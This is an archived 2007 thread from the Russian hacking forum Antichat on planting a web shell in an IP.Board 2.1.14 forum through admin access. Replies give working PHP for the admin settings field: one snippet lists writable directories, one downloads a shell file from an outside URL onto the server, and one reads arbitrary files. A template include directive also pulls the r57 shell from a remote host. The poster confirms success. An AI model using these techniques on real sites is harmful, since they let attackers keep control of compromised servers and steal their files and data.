Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Заливка шелла в ipb 2.1.14, имея доступ в админку (https://forum.antichat.xyz/showthread.php?t=36757)

Rosssi 30.03.2007 18:47
Заливка шелла в ipb 2.1.14, имея доступ в админку
 
Везде искал так и ненашел способа.
Имею полный доступ к админке ipb 2.1.14.
Через смайлики не заливается что делать ?

guest3297 30.03.2007 18:55
http://www.someshit.net/showthread.php?p=357#post357

win32_reverse 01.04.2007 00:41
попробуй через инклудинг, помоему это сработает

pogant 02.04.2007 03:25
лей через настройки.

GrAmOzEkA 02.04.2007 09:34
Заходиш в настройки -> выбираеш любую настройку -> добавить настройку.
В поле php код вбиваеш:
Цитата:
$d = dir(".");
echo "Path: " . realpath($d->path) . "<br />\n";
while (false !== ($entry = $d->read())) {
if (is_dir(realpath($d->path).'/'.$entry)) {
echo "[".$entry."]".(is_writable(realpath($d->path).'/'.$entry)
? '[w]' : '').
"<br />\n";
} else {
echo $entry.(is_writable(realpath($d->path).'/'.$entry) ?
'[w]' : '')."<br />\n";
}
}
$d->close();
Потом ищиш диру где разрешена запись и таким же способом загружаеш шелл, вот код для удалённой загрузки:
Цитата:
$linky="http://site.ru/shell.php";
$saved="/путь_до_расширенной_диры/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);
У меня такое всегда работает даже когда SafeMode On
Если хочеш прочитать какой либо файл ,то вбиваеш в поле php код следующее:

Цитата:
echo nl2br(htmlspecialchars(implode('', file('/путь_до_файла/file.php'))));

FQziT 02.04.2007 15:43
Для особенно "пряморуких" людей, у которых не получается ни один из вышеперечисленных способов, а шелл заинклудить очень хочется )) Есть вариант работающий со всеми версиями IPB.
В основном шаблоне форума (Board Header and Footer Wrapper) можно вот так заинклудить
Код:
<!--exec.url="http://underwater.xtoolz.ru/shell/r57.txt"-->
Так же и локальные файлы инклудить можно только с помощью exec.file.

Rosssi 02.04.2007 16:17
Cпасибо ребят! :) Я как 2 дня разобрался с этим :) Вся инфа тут http://www.someshit.net/showthread.php?p=357#post357!


Время: 12:44